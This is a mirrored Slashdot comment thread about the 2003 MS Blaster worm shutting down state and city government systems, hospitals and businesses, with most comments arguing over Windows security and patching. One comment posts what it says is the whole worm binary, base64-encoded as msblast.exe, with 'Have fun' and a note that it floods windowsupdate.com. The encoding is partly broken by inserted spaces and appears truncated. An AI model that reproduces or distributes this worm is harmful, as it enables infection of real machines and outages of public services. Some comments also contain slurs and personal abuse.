Slashdot Mirror
Windows Virus Takes Out Gov't Agencies in MD, PA
Zolzar writes "Looks like the Md. State Motor Vehicles Administration is the first government agency reporting a failure of their systems due to the recent virus." This is a more specific story about the outage. And the city of Philadelphia has suffered as well.
Let's prove how insecure everyone already knows Windows is by shutting down government agencies, gee, I am sure the "haxor" would have been really proud of his/her self if he/she proved their point by porking say a hospital's computer system. What an asshole.
I hate sigs.
In Soviet Russia, government agencies take out you!
C'mon, this is getting so old ... but I guess that's the really pity, isn't it? Gives cities like Munich the last laugh.
A feeling of having made the same mistake before: Deja Foobar
Does this mean those chickens are finally coming home to roost?
Quite an experience to live in fear, isn't it? That's what it is to be a slave.
The patches have been available for a LOOOOONG time now. They should have patched. They can't whine now. End of story.
www.sitetronics.com/wordpress
The person who created this worm did so to show that Microsoft's software was insecure. Their methods are bad, but they've shown that no matter how good WinXP sounds compared with Win9.x, it is still made by Microsoft. If you don't want this kind of rubbish, don't use Microsoft.
DSL reports has a security forum that has been taking this sucker apart and giving us the code:
r oo t=security,1~mode=flat
have a look:
http://www.dslreports.com/forum/remark,7649146~
..has been hit too.
You would think that somebody at the MTA would know about the patch, but no.
You still need a competent person to maintain the machines, no matter what software you go with.
Bringing down the DMV may be the best use anyone's ever found for a virus.
It's good to use your head, but not as a battering ram.
We discovered we got hit when our Sonicwall connections hit the limit every 10 minutes. It took us two tries to clean it all up.
And who was it who brought it into the office? The CEO. He thought he had a virus but connected to the network anyway. Mod that funny if you will but try being part of our network support team.
"She's a West Texas girl, just like me" - G.W Bush Iraqis
Good ole, trustworthy, reliable, secure, best OS, Winblows.....how can it still remain on 90%+ of PC's? That should be on unsolved mysteries.....
Looks like viruses like this may help speed adoption on alternate operating systems (like linux, OSX, et. al) on the desktop quicker than a dozen ESR's with geek infantry in tow.
Spoke with both sides of the family this evening, going on about how messed up their computers were acting and all they had to go through to get it patched up. I listened and informed them how well my iBook and the relative merits of UN*X and they listened...
Thanks again, Bill!
Woo hoo! Maybe they'll think more about the systems they run. Same old story, same systems. I'm turning my pager off this week, since I'm on vacation. Besides, I'm the 'nix guy... :)
... Windows Update once every couple weeks.
I know there'll be dozens of "they shouldda been using un*x" posts, but in defense of Windows, there has been a patch for this on Windows Update since July 16. Even I had enough time to test the patch on a non-production system between then and now. Every platform gets its 'sploits throughout its lifetime, it's just a matter of learning about them and applying the proper patches in a resonable amount of time... especially on mission-critical machines. (DMV computers, etc...)
Are you, by any chance talking about MS Blaster Worm? ... Maybe then the media will get the idea too!
:/
Its good for us to keep using the correct terminology
Ok, time to get modded down.
A radio news report tonight said that a 3M plant in Minnesota shut down Tuesday due to a computer worm. Somebody's trying to run a plant dependent upon Microsoft...
"In Sweden, Internet provider TeliaSonera said about 20,000 of its customers were affected after the infection clogged 40 servers handling Internet traffic.
Among companies affected in Germany was automaker BMW, said spokesman Eckhard Vannieck. He said the problems did not affect production."
Really makes you wonder who ain't sayin...
I can forgive stupid home users, but shouldn't mission critical things like these patch every now and then? The hype surrounding this has been huge, and if you run unpatched microsoft stuff, well, good luck fixing it now. It will take a long time, but at least this worm can be fixed with little damage. Maybe this worm will get people to pay attention to security, but then again people said that about the last dozen MS worms.
STUPID!!
SAILING MISHAP
Sounds like we might need to get Skynet onto this one!
...after NASA Linux systems where taken down by Ramen, a worm based on an exploit patched 5 months before (the vulnerability used by Blaster was patched 1 month ago)
what recent virus? we all don't live and die by the newest norton update, someone tell em what the hell "the recent virus" is.
Their fault-the patch was released over a month ago, before there were any known exploits for it.
when a new Microsoft worm or exploit is out. But after the initiall updatestuff it all settles. The latest RPC vulnerability the Blaster is already slowing down according to a Cnet.
And I guess that eveyone that have some firewalls and uses common sense allways survive these attacks. At my companys network we use Win 98 instead, so we were able to escape this worm. Actually it looks like all the new exploit are on these new Win2000 and XP versions, so to me Win 98 or Win Me looks like a much better choice in the security area.
Proud patriot and republican voter.
Here's the entire virus, base64 encoded. Have fun. It floods microsoft.com/windowsupdate.com starting saturday.
begin-base64 600 msblast.exe
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAA AAAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIb gBTM0hVGhpcy Bwcm9ncmFt
IGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ 0KJAAAAAAAAA BQRQAATAED
ACp8Nz8AAAAAAAAAAOAADwELAQI3ACAAAAAQAA AAUAAA8HEAAA BgAAAAgAAA
AABAAAAQAAAAAgAAAQAAAAAAAAAEAAAAAAAAAA CQAAAAEAAAAA AAAAIAAAAA
ABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAA AAAACAAABIAQ AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAFVQWDAAAAAAAFAAAA AQAAAAAAAAAA IAAAAAAAAA
AAAAAAAAAIAAAOBVUFgxAAAAAAAgAAAAYAAAAB QAAAACAAAAAA AAAAAAAAAA
AABAAADgVVBYMgAAAAAAEAAAAIAAAAACAAAAFg AAAAAAAAAAAA AAAAAAQAAA
wDEuMjIAVVBYIQwJAgnH/kZfgu7TdDBUAADREQ AAICwAACYBAD 3+//L/McBA
i0wkBPdBBAYAdA+LRCQIi1QkEIkCuAO5/3fvEM NTVlcSEFBq/m gAEEAAZP81
Ff/b3bkGiSUZIItYL3AMg/7/dCA7dH/Z3P8kJH QajTR2iwyzVB dIfLMEAHXX
d/+///9Uswjr0WSPBTWDxAxfXlvDVYnlXFVqAL 77724BaJJa/3 UI6AEAE0Bd
HInsXcP8e/v/7iCD7Agji10Mi0UIozBAJYkdNA V7az+290CudX KJRfgZrEX8
oxb7d/vtjQ2JQ/yLcy17CJFijQx2ge7W/mWPdD pWVY1rEIYLXV 5NW7bW/QnA
dCh4MSVTcpF2BB33u2WsVgwcCDaLBI+LQwwwvw v/XAglDzSP66 ws63FHav92
3dthKgy8xwUQeguOagtz2M3sQBQYX3UhGQi37w 7ICAe4OwDrJ4 P4oSpQLhv2
ClAkHg0Aug8h5pQoD4M9LBoAz97ewz7ooQ5y/+ BYENdkod0Mh6 FdNZ5oHBtV
sxCEZppQqkkQI7j/f4ll6FDZPCRmgQwkAAPZLC Rjfyhee/Z9Li QEIH4ToIkU
z7YX2QUkFkgUHBJQ1/H3bzcYMcmJTfxQKrjJwx GjZYc3x9/Dfo HsrDpsMfZq
ke+OubtQXz8AD2ZqXUhlAgAAgJ4d3z+IajJoPM YBBElI+L7ZB3 uUB3xoQ0gd
DUzhxx7+BAQ9t/kHEhLUjYVg6GvYuXb/UFFSEB H82i8ULcglDw EBGkz37Y1h
ESLI/+kLBWxoBCexN+Y2+TBpZxC328ZjW8MSRK 8MGk5HE1jrkf v7O/slLDFA
DTQhFDBZBQy5/pV7Ye6/mff5iddHiT0UShUVOD U+07mSQaSG/I TkuU/YOwEP
hPAAFMyJhVwL2D6ZrXcZ1kM5AAvKB9k2/kUEi0 CSMCxUE+hbYf ve/7ULN3ju
QCtJvZzs/T1XfSRoPhBaFEjeex+2WDmsoyiRIf SFFfLIHBAw/E p4c6U8ijy9
FH4fCA/f9+QUKRUjoWWjD6EK2zh8UqMGF0Y1D7 fUfoP6DH0CID k0KNZz9iFn
HQoHfgobAlPySngJ9nU8fCgxELDwWwmPnGoD5v QYrY+3Njzmmg koVLyULN/4
GPA6Lx/2byMDWfwPfw+NffBXDgh+Fvtmxx40L8 EeOBtwBHqp9b 0Hc+v5PwhA
zMnCEMnN5E4lLFWT6zhAOPzQujICAczAoyRgQf ij+x5FGWqRhd j9gX/b2K70
d2bHDwIbRTBUicKaOXf3ZomV2hGDpdwFMjAzO7 7nX0oj2FOF9j rZRrpm+BAJ
jVAG6CbsGN25BKHU+ziETqd334gBD4y8LzHbaD e/K9B87PqJ0L KJxqueQ5a7
uaw3i/yJ2CWKg0yn5rIV/lYH1Bcog9zRAP7cxM eDbJO9xscEz5 CPV8T8g/Td
haiLfCJohAORgaYbv7//snMLVg3EWTrrBdM6Fu zGBkgbdA4TEQ WIzrrMXLk4
QErwQuCcLhQelFuVjYE927b5nX4ifg/nLQUw6w gHLIdszyxHIj A7MBnk9phe
GBAwIiHbI3IQMIoxKOQYP8sHKOuWwwCMARDGiv BFkP12lOFOcL cWDNpohxo/
xvggHV91ljH/JQGJRL2wG6ajNd8DJli0kP9agy 9+ZgSAVxMzYE eD/9vZHuUU
fM6DwzUFMA9jnSMQMAQr0gAP6yBIIxMYDBFs7T XGElmshfmKC+ Rgr20OmKak
YRIU27cgfKBoCAePa4NlpAADqPvTGS6leN4GdO sZi7UIjb379o tcODmctXwK
dBT/hRKF2wM79ig5C3LZDXUcfEAtdnLZcxc5if 8jhz4ivdOkUB cLdx+QsfAh
bH0LAPDrOUWMyVxHi+kG5nw7uzjYBLYgX4A5EQ kl3MZL5s462f UuMcNZPzwe
sbg0KQe0tRNeMzfX8OpTBnasEocXwXWpvdtuqU E4aOwcnRML68 fN7ZMKn3UY
Mr2kjTXAjjSf2265EpvzpRJE5whB2IM0n4Po7W hEBAg8B3me53 gP9Oq00nwO
8rPY5oBHDA3O1iA4puw6NbptyBjrkNAnzGIlu3 cu9WADgiEA8O v4fuX87xyB
hYxmY4vv94p8XQkFColoHHJgb7A5BS4+cA57ka 1WzKomcOTWdE g8BgE8Iw
Why does the American public - much less the American government - let itself be duped into using insecure, closed-source, and only half-functional software? It's not the money - the government has to stinking pay Bill Gates and crew for the privilege of using his junk. It's not the jobs - there would be other jobs out there (with RedHat, or Apple, or any of a dozen other OS makers) without MS. In fact, there would probably be more IT jobs than there are...
So why do we put up with it? Please, I'd love to hear ideas. I don't know of much of anything that the average bureaucrat, or military office, or CIA spook, or DOT drivers-license-tester can do on Windows/Office systems, that couldn't be done under Linux or FreeBSD. I really would love to know why, when Germany, India, and who knows how many other countries have ditched closed-source software for OSS, we can't do the same...
Any thoughts?
Web Design & Software Development
Interesting. I had noticed when I stopped by Municipal Court to schedule a trial date that the computers were down. I was told by an employee that it was due to the power outage, a comment that didn't make sense considering that I knew for a fact that the server farm was a floor above us...
As pissed as I am at the asshole who wrote the worm (it took nearly half an hour to schedule something that normally takes 2 minutes-- thank "Bob" that I was in Municipal Court, which is only starting to modernize from an old IBM mainframe setup, rather than in Common Pleas or Federal District Court, which are totally computerized-- and in he case of Common Pleas at least, running on Windows), this is, of course, another example of why governments, in the name of security, should go to more open-source solutions.
My wife's entire 1500 plus employee company was instructed today to not turn on their computers until IT came around to look at them. I guess a few computers were infected with this worm and they wanted to ensure things were taken care of. So, here's the deal: I figure that today alone, due to lost productivity, salaries, benefits etc.... this company lost $250k from this worm. So, I ask: When are companies going to wake up and realize that the fundamental foundations that Windows are built on are flawed when it comes to security? There have got to be studies out there examining total cost of ownership of the various platforms. For instance, I spent a couple days of my time updating our remaining Wintel systems to guard against this virus and am soooo happy 95% of my work is done on OS X.
Visit Jonesblog and say hello.
I just want to say LOVE YOU SAN!! billy gates why do you make this possible ? Stop making money and fix your software!!
:)
I read that this morning and smiled, at least these hidden easter egg messages have a bit of humour to them
Of course I wasn't so happy when the workload resumed and I was left with a nice deal to clean up.. but.. thanks for the couple hours of coffee break?
I keep hearing that windows 2k3 is the most secure windows, but (and I'm truly asking), what makes people say so? I'm using it at home. Evidence for: logs changes, logs every reboot and needs you to enter a reason, insists that every site (including google) has a security issue, comes with almost everything disabled, doesn't let users use shockwave et al without permission, probably some bug fixes. Evidence against: see the article above. At least it informed me afterwards that the computer unexpectedly rebooted . . .
PS: Please don't mod me for flaming, I'm really wondering what inner changes there are, other than the ones above that give the impression of security.
A friend who works at blackbox told me "hundreds" of computers shut themselves down at EA Studios out in Burnaby this morning ... HA HA
I mean... who on Earth would expose a Windows machine to the internet...
Troll or not... it seems to be just common sense with 8 years of data to back it up.
One of the downsides to having just one type of OS is that it makes you very vulnerable to this sort of thing.
As far as blaming people who haven't patched their computer, I can't see it. This thing is hitting home dialup users fer crying out loud - my friend had to drive over to his dad's house to disinfect a machine. You can't expect everybody's grandmother to behave as a professional sysadmin.
When they find the Linux users who did this I hope they lock them up and throw away the key.
So all someone has to do is dislike Gates and Microsoft, write an Windows virus, and they are automatically considered a Linux user?
Cool.
The unofficial
If this was a "pro-linux" motivated attack, then surely this troublemaker's attentions would've been best directed at sco.com rather than windowsupdate.com, no?
~
~
~
-- INSERT --
First off, congratulations! Secondly, though, that's just the point: it is a $100 rock. This is what happens when somebody gets a monopoly - De Beers undersold everyone, then jacked the prices to the moon, and nobody bothered to try to stop them until they owned the market. In fact, most of their major execs can't set foot in the U.S. without getting arrested for racketeering, anti-trust violations of all stripes, etc...
Power corrupts; absolute power corrupts absolutely.
Web Design & Software Development
> microsoft rules linux sucks get over it gay linux faggots
Yeah, Linuxers are just jealous because this software won't run on their systems.
Sheesh, evil *and* a jerk. -- Jade
Seriously. Governments and businesses. Every time a pimply faced half-hack writes a new $krYp+ to take down the stand-up comedy act that is Windows Security....
/. knows.
/either/... We also know that *any* poorly adminned box is a deck of cards, but C'mon! look at the vast canyon of difference, just in how installations come out of the box!
/me gets off soapbox again.
"Blame the admins for not patching when patches were available"....
This has some merit, yes. *BUT* has anyone ever adminned a server that must be up 24/7? If you've got a whole room full of them, you just don't have the time to go in and manually apply patches. Yet, automatic Updates pose another problem: You probably just can't have a MSSQL server doing unexpected reboots all the time. You can lose data, what if the patch breaks something? etc.
And even after all the patches and fixes (we're sidestepping the Microsoft "patch one hole, open 3 others" issue for the moment), stuff still happens. Servers get knocked over. Look how many times it's happened in the last 12 months.
For home users, a disabled computer is a bummer, sure. But for businesses and governments, when will they simply decide that "This Just Cannot Happen Anymore."? Seriously. We're talking lives, national security, and huge amounts of money at stake here.
The alternatives are out there. I know, you know, and
We all know that Linux, Solaris, *BSD and the like are not 100% perfect
When will they learn? Seriously! I think it would make better business sense (read: make more money in the long run) to look away from Microsoft and look towards other Free(software) and Commercial products.
Fwiw, when i booted up my WintendoXP box to download the patch, i got nailed before i got to type a URL into the browser!!
C'MON!! AT LEAST GIMME A CHANCE, DAMMIT!!
do() || do_not();
I work in IT for the Department of Transportation in TX. Today, around noon, we suffered state-wide outages. It would have been easy to prevent- we have the tools to automatically deploy patched and updates to every computer on our network. Unfortunately, the people who have the necessary privileges to use do so, didn't.
My section was not affected, because I took it upon myself to patch the computers I was responsible for. Hundreds of people in my building were unable to use their computers for half the day. My section had problems because the servers we rely on were infected.
I hope (in vain) that 'little' problems like this will teach system administrators to keep their machines up to date.
Here at Drexel University our lab computers have been effected, and we couldn't access our data properly. The funny thing is that our president (Pappy) today was right outside with three segways touting out technological proweress, rolling along to Born to be Wild blaring in the background. All the tech in the world doens't matter if you don't use it right.
..they are an "ordinary asshole," as opposed to an asshole "trying to get people to switch to Linux" ?
The unofficial
A friend of mine spent the entire afternoon patching machines in his department at the university where he works, because their IT guy is on vacation this week. And the entire finance department was sent home for the afternoon while their system was patched up.
I know that the ~3 weeks that the patch for the RPC vulnerability has been out for isn't a huge amount of time to test things, but with a vulnerability of this scale, it's really incumbent upon IT people to get networks patched quickly, and it really reflects poorly on the IT department of any organization that gets hit, if you ask me.
Hello I believe the RPC vulnerability it's a great risk, but lets says that Microsoft had another similir vulnerabilities (IIS?). THe big rpbolem here it's the users and the sysadmins witch a lack of knowledge or the actitude "i believe everything in Norton's site". I remember a few weeks then it came out the RPC vulerability, sites like antivirus.com have it in "Low risk". Another example it's the people who rowks on my school, there are several sysadmins (like 4) and they sent an email about using a firewall, and that will fix the problem. I mean, you need to apply patches... you NEED to deploy fix tools, but no. Maybe it's not government, but come one, you can get a shell with the vulnerability too in a profesor computer, student's paradise? maybe. This misinformed users because of bad admins, it's like virus' hoaxes in E-mail...
will they learn? this is our tax money at work. holy crap. we must demand better. can the cost of linux transition really be more than all the windows problems?
My problem? I was perfectly gruntled, until some numbnuts came by and dissed me.
... has already been referring to it as the Windows worm (or virus).
Pretty funny.
That Microsoft update website (the first thing I go to after the rare occasion of me rebooting to my windows partition) was slow a syrup today. It seemed rather odd, but I assumed that it was due to load.
This would certainly eliminate the deplorable labor conditions in the third world, as well as fix the awful problem of homogenous computer environments (i.e. M$ dominated networks).
No its bad software compounded by lazy sysadmins...
they got one thing right when they wrote it - Billy Gates why do you make this possible? Stop making money and fix your software!! . yea, its a huge pain now, but think of it this way - either microsoft realizes it needs to fix its problems and does so, or microsoft dies due to the worm. it's a win-win situation :)
I'm trying to get on Windows Update right now (I was already patched, but, just routine patching -- flame away). Its running really slow... probably because of this virus. hah. sucks to be you
I think my principles are reachin' an all time low
That's impossible... Windows XP is the most secure OS in the world... This is just an illusion...
The 10pm news here in Philly interviewed one of the city's IT guys. He stuttered and stammered his way through the whole thing, and looked to me like a man afraid for his job as he claimed that there was "no warning and no way to be prepared for this"-- not a verbatim quote, but close enough.
I think the guy is right to be afraid for his job-- he's pretty damned incompetent to have not heard about this. This vulnerability was quite publicly announced weeks ago, and Microsoft's page with the patch is dated July 16. Even Homeland Security released a bulletin, and I'd hope that if nothing else those would get around in a city government that is supposed to maintain a level of disaster-preparedness.
Then again, this being Philadelphia, that guy likely got his job through patronage and wasn't qualified for it in the first place.
~Philly
Well than...that must make me a freaking linux genius! :-)
...that I'm a damn programmer, and my system was secured from this exploit (due in large part to my overly paranoid nature), but the workstations belonging to my depts microcomputer support & network manager were all vulnerable and hit. Dumbasses. I spent my entire morning trouble shooting, patching, and fixing the workstations belonging to my office's higher-ups & executives (I was specifically requested by them, I might add), while the network & micro fucktards ran around fixing the computers of the no-counts. Needless to say, I pissed off a lot of people today, but thank God they aren't the ones who sign my check.
I look at the never ending laziness of network support as continuing to supply me with the opportunities to secure my employment. Also, the thank you email from the prez really gave me a chubby.
Spread the RC luvin'
Is it just me, but AFAIK this was NOT a part of Windows update
It seems you have to go to
http://www.windows.com/downloads/
to download the patches
On another note I have had 2 Windows installations die in the last 2 weeks after failed Windows updates
What a POS OS!
If something like Lycoris were on 95% of computers out there, where everyone runs as root, maybe some more sploits WOULD occur.
However, assuming that the damned distros that made it onto 95% of computers out there were just secure out of the box (eg. you don't need any damned services running by default as a desktop user, there's no reason for this vulnerability on Windows!) then this would never happen on Linux, or any other Unix for that matter.
Also, this is not a virus, it's a worm. Viruses have been shown to be pretty much harmless on Linux, because of the fact that they would have to have exploits and such things coded into them to be really really effective. Linux worms have been exceedingly rare anyway, compared to Windows.
-toomuchPerl
Yeah, we've surely seen to what extent microsoft rules... Personally I run linux, and couldn't care less for the losers running windows...except for the fact that their fucking OS has managed to clog down the entire internet. High five to BillG. Even when running a proper OS, I have to deal with the effects of lamers running windows in their parents basement
I honestly don't mean to be nasty about this, but the entire open/free community really needs to understand mainstream and business users far better than they do if Linux has any hope of making serious gains in those areas beyond the small server market.
And I know this for a fact. I had a machine that I re-loaded XP on for a customer since he was upgrading his mootherboard. Friday I finish the windows load and I install all the patched available on the update page. Ran it once to get the first 80Mb of patches, ran it to get Media Player 9, ran it again to get the security patch for Media Player 9.
That's everything on the update page.
Installed Norton AV 2003 and got all the updates available as of last Friday. After doing that one would have a reasonable expectation of being safe against a problem, especially since the problem was discovered a full month ago.
Monday the customer called with the machine giving a 60 second countdown and rebooting.
Now even if the people at the MVA and other places *did* the updates from the updates page, they'd still be screwed.
All I want is these virus programmers, their fingers, a ball-peen hammer and 5 minutes...it's all the time I'd need
-- Wiccan Army, 13th Airborne Division "We will not fly silently into the night"
you change the paper and toner in the LaserJets.
Wanna-be BOFH types are funny.
My bad. I made a bad link that wasnt what I wanted:
r oo t=security,1~mode=flat
If you wanna look at the code its HERE:
http://www.dslreports.com/forum/remark,7652257~
The grain of salt is that they are reverse engineering. But it still is there and interesting.
Again my appologies.
I am going to have to agree with those who disapprove of the 'haxor' who designed this virus...knocking the MVA out might not be such a big deal but it has infected the computers of at least one police agency. Any messing around with the computers of a police agency can cause safety and property to be put into danger. NOT cool.
Comcast as a whole got blasted, not surprising.
& sid=1& A2=ind0307&L=ntbugtraq&F=P&S=&P=93 40
A win2k sp3 machine I patched has something like 16 critical updates needed. Several reboots.
That's too much downtime. You can update just about everything but the kernel in linux/bsd without a reboot. Going through this every couple of days is a drag!
The architecture is fundamentally broken: the enabling stuff by default; implementing dozens of new ways for strangers to do things to your computer without your knowledge (as features!) with each release; welding mere applications (web browser, email client) to the OS, having them run with system priviledges, and making it impossible to remove...
Finally - windows update is fundamentally broken. It will report success when the patching operation fails. This is one way:
http://www.ntbugtraq.com/default.asp?pid=36
They need to start over. Maybe if they start clean they can come up with something that compares to Linux.
I'm surprised that no one's called it; The Master Blaster Worm. :)
I fail to see how issues like this show that windows is fundamentally insecure.
- The patch came out a month ago.
- They have 90% of the marketshare, so one would assume that 90% of the viruses created are written to target exploits on Windows.
- They have 90% of the marketshare, so one would assume that people who spend their time looking for security holes will spend 90% looking at Windows.
If Linux had 90% marketshare and was used mostly by people who don't patch, like Windows is, I fail to see how architectually Linux would be more immune to this type of attack than Windows is. The reason this doesn't happen with Linux is not because it's oh so superior to Windows software wise but because it's used by less people (less rate of infection, less motivation for hackers to write viruses), and the people who use it are competent enough with computers to make sure their stuff is patched and healthy.
The people who run Linux at home or in the office didn't get this virus because their Windows machines were patched. Why do you think that is?
--
> And who was it who brought it into the office? The CEO
Sure maybe they didn't patch, sure they connected their system to the local network.
There a few common sense notions that people rightfully have. Among these are that 1) you can be on the internet and 2) connecting your system to a network should not harm other computers. If theory and practice are incompatible, I think they should rethink the practice of computers rather that the above two notions.
"In theory, practice and theory should be the same, but in practice they're not."
The fact is, there is no 'secure' operating system, but there are enough things that can be done to prevent virus infections that any large company stricken by this virus should fire their IT staff TODAY.
What company does NOT demand auto updating anti-virus software on every system connecting to their corporate network? What company does not have a person in charge of installing MS patches within 24-48 hours of their availability? Dont give me that crap about being afraid of the patches, because if they damage your network, you can blame Microsoft and save your fucking job.
Viruses are a reality for Windows networks, and companies without policies and recovery plans to deal with them should fire their staffs and get competent people in place. Businesses need to understand that competancy costs MONEY, so if your IT people are paid dirt wages, your network is a sitting duck, trust me. Can your MCSE who cant tell you what circular logging does on an Exchange installation. Fire the fool who told you to build trusts between multiple AD forests, I dont care how reasonable his explaination was. I see this shit every day, because 80% of Windows admins suck monkey dick. Microsoft is on their 3rd round of creating a certification program. Maybe they should consider taking the aftermarket PROFIT out of it, and stop caring about pass/fail rates long enough to get a core group of people who know what the fuck they are doing?
There is no excuse for this shit anymore. A virus attack on a company running Windows these days should mean an instant termination of the staff that let it happen.
I guess it's time to offer my services to all thosecompanies who have flower arranger paper MCSE's who are getting fired tomorrow :)
You're putting it like it was an intentional attack on these institutions by a hacker, but really, it wasn't a hack, it was a virus, which should, more or less, indiscriminately deal damage. It was probably not the intention of the virus' author to infect nothing but government institutions.
And you thought the wait in line at the DMV was long before... I feel sorry for the people there today!
Someone posted to "Full-Disclosure" this affternoon asking for opinions about whether a future virus really WILL delete all hard drives, or do something truly dastardly AFTER passing itself on?
Personally I think this is what it'll take before tha average user starts to have a clue they are running an OS that opens their machine to hackers and kiddies around the world. A full delete would open a few minds perhaps...very few users seem to realize reasons to back up, protect their passwords.....all the things that admins worry about on a daily basis....
Everyone who was affected by this latest virus should actually thank the author that they were infected, noticed, and patched.....next time might be truly serious....
let's hope and pray!
A common thread in many of the reports is the unwillingness, or inability, of many organizations to spend an adequate amount of money on systems administration and security. How many organizations take a "If it's not broken, don't fix it" approach to dealing with computer systems? Some organizations appear to think that an anti-virus package is the silver bullet for the problem, and don't understand why their computers were affected. Others rely on outside contractors or consultants to fix problems after they have occurred. I've worked in many places where there were no full-time systems administrators. Management depended on local PC "gurus", whose primary job was something else, to keep things running.
Mea navis aericumbens anguillis abundat
This is the factor no one talks about in the endless streams of cost comparisons between Linux and Windows: What does it cost a real-world installtion to convert their entire suite of apps and data from one environment to the other, including retraining personnel.
For some applications, like vertical markets (e.g. cash registers) this is not a big issue--all the conversion happens behind the scenes and you're not dependent on a slew of other apps. Bit for a typical office environment you have a huge investment in software, some of it purchased, some of it developed in house (and in some of those cases they don't even have the source any more). For many businesses and individuals there's literally no accepable way to get from their current environment to a Linux-based one that does the exact same things. So they stick with Windows, and they bitch like crazy about it to people like me.
Maintaining this crap is taking way too much fsking time. I have a lot of other projects that I could advance but instead I get to hit slashdot while watching patch progress bars randomly increment.
This is not good, it's not acceptable, and I am moving toward not accepting it. Screw em. Lousy products, massively offensive licensing terms (both in dollar amount and provisions), and smarmy, arrogant execs. Piss on them.
Here in Columbus, OH, the BMV is down, along with the patient tracking/data services at several major hospitals. Apparrently St. Ann's has closed to incoming traffic because they don't have a paper fallback system. Oops.
Parent is the victim of moderators who did not even bother to look at the link. Clearly, the parent is not a troll, but an attempt to be funny. Mark the moderation as unfair.
If I'm not going to get karma, I'll stand up for those who should (or at the very least not lose any).
And as a person that works for a multi-billion dollar corporation, let me tell you that Microsoft's market share will not remain what it is unless they seriously change the way they do things.
I just want to say LOVE YOU SAN!! billy gates why do you make this possible ? Stop making money and fix your software!!
Love,
Letter
This virus messed up the American Express network hardcore.
The majority of MS worms are created by little nerds in basements using pirated copies of Visual Studio. Not Linux users. They are know as script kiddies and are all over Usenet sharing their windows expertise.
So bullshit to your post.
OH THE SHAME I fell off the wagon and use sigs again!
My mother works for a hospital. (I'm not going to say which one.) It seems that the crappy IT girl (My mom's nemesis. I'm serious here they hate each other. :]) there didn't manage to get the system patched in time.
While most critical systems (read life support) were not affected, some other systems (read the software that is used by medical records) were affected.
This means that reports, some of which diagnos serious diseases, are unable to be delivered to the patients that need to know about them.
I have a lot of other projects that I could advance but instead I get to hit slashdot while watching patch progress bars randomly increment.
And what exactly is downloading stuff preventing you from doing? If you can surf Slashdot, you can write or program or e-mail or do whatever else you need to do.
You think there's another OS out there that's easier to maintain? Macs, maybe, but even Macs have large updates every month or two.
My department's network consists almost entirely of win2k boxes with the odd 9x client at some of the less well funded sites. We've got a dozen 2k servers and roughly 300 workstations, the vast majority of which were patched, and a restrictive firewall. Today we got hit by a worm for the first time, from another county department (behind the firewall), and from a dial-in client at a charity who uses one of our databases. I blocked port 135 from the rest of the county and terminated that dialin client, and started checking out the few boxes we knew hadn't been patched yet. I want to stress that the worm that hit us was not the MSBlast thing everyone's talking about. It doesn't shut down the machine (although it seems to crash the RPC service ~50% of the time). It's not detected by Trend's newest definitions (that include msblast), or by Symantec's msblast remover tool. Whatever it was, it did a number on those workstations and we left them unplugged from the network pending figuring out what the hell is wrong with them.
It seems to spread the same way, scanning network ranges (apparently at random - when the dialin client finished scanning our block it went on to start scanning 5.69.something) on port 135 and attempting to infect any it hit. One thing to note is that is crashed the RPC service on a couple of fully patched clients, but for most of them it had no effect. On the ones that it did infect (IE, the ones that weren't patched), it disabled file copying through the GUI (both drag&drop and copy&paste). It also disables a number of odd things, mostly dialogs, like IE's "Find (on this page)" Between those two I suspect it infected at least one system DLL. Something it did didn't agree with Word, which would popup up an error on creating a new document, saying that the document could not be registered, so other documents would not be able to link to this one. I didn't spend too much time on it (There were only a few unpatched boxes, we took them offline and went home), but I didn't find any reference anywhere to this. It wasn't scanning out from the infected machines, so it may have a time delay or something built in.
So, first, the people in the story weren't the first government agency to be affected, by far (although none of our public services were affected AFAIK). And second, has anyone else seen a second RPC worm going around? Or is this some mutated version of msblast?
Just wait till next week, when one with a destructive payload is released...
I'm actually glad this particular worm hit, and not something much nastier - think of it as warning shot, if you will...
smash.
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
Not to come off like a MS apologist, but do people here honestly think Linux is the magic bullet to rid the world of worm's like this?
Think about it. If an incompetent admin isn't wise enough to keep up to date with MS patches, do you think he'll be able to properly administer and secure a Linux box? How hard is it for these guys to either get a decent firewall, or click start>windows update?
You can't really blame MS for this one, they had the patch out a while ago. The problem rest solely witth lazy and/or imcompetent admins.
As far as home users go, if they can't figure out Windows, why would they bother with linux?
It wasn't a fucking virus, IT WAS A FUCKING WORM!
News for Nerds...you should fucking know better!
If only someone would have alerted the sysadmins of the world about this RPC problem, back when it mattered, like in July, around the middle, like the 16th -- then maybe the robots wouldn't have taken over the world.
"Sig free in '03!"
It's like digging a hole in the water. (In this metaphor, the water is NOT frozen, 'kay?)
We IT gnomes have other things to do than patch and patch and patch and patch. We can't trust Windows Update to even correctly report the status of the application of a patch. We have users screaming for new installations, new hardware, new software, new networks, wireless, email, etc. Staffing doesn't get determined by workload. Not in my world.
I recently took a contract job to bring the IT operations of a local, growing business from a mom & pop deal to a more enterprise ready footing.
I have about 25 XP/98 machines to look after, but only 2 of them laptops (3 if I count my own). First thing I did when I was hired was grab both of the laptops and patch the hell out of them. Next was the 2K server, and lastly today I spent the whole day running around updating everything I could on the rest of the desktops. No programs got hosed in the update process either, which was a relief. We're behind a small NAT engine too, so I feel rather confident that we'll weather the storm.
My point is that businesses such as my current customer have no clue that an operating system (indeed, almost any program as well) needs to be taken care of. This is the issue that will keep biting Microsoft in the ass - until they make it plain as day that "You need to do regualar maintenance to our products" people will run with security holes. If they can't see that it's broken, why would they fix it?
Another point - I'm looking into SUS so I don't have to worry nearly as much (or spend so much time waiting for WindowsUpdate) but I'll need another server to use it. The lone server my customer has is almost over loaded at the moment, runing SBS with 256M of RAM. SUS requires 2k Server or above to run - why, I don't know. Just like Microsoft to turn a problem they've created into a marketing opportunity. No wonder they're having trouble stemming the Linux tide.
Soko
"Depression is merely anger without enthusiasm." - Anonymous
How could one already be infected if their computer hasn't been running? Maybe he's implying "as soon as you turn on your computer you'll be infected", I don't know.
